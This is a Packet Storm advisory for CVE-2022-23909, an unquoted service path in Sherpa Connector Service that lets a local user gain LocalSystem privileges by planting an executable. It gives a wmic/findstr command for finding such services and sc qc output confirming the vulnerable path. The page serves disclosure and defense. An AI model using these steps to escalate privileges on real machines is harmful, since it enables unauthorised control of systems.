Headline
CVE-2022-23909: Sherpa Connector Service 2020.2.20328.2050 Unquoted Service Path ≈ Packet Storm
There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a “C:\Program Files\Sherpa Software\Sherpa.exe” file.
# Exploit Title: Sherpa Connector Service (v2020.2.20328.2050) - Unquoted Service Path# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)# Version: 2020.2.20328.2050# Date: 02/04/2022# Vendor Homepage: http://gimmal.com/# Vulnerability Type: Unquoted Service Path# Tested on: Windows 10# CVE: CVE-2022-23909# Step to discover Unquoted Service Path:C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """Sherpa Connector Service Sherpa Connector Service C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe AutoC:\>sc qc "Sherpa Connector Service"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Sherpa Connector Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Sherpa Connector Service DEPENDENCIES : wmiApSrv SERVICE_START_NAME : LocalSystem